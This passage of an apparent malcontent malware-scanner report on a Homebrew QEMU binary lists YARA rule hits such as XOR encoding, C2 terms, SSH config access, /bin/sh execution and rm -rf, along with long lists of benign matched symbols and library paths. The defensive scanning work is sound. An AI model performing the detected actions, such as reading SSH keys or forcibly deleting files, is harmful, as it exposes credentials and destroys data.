--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | -| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | -| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | -| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | -| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | -| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | -| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | -| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
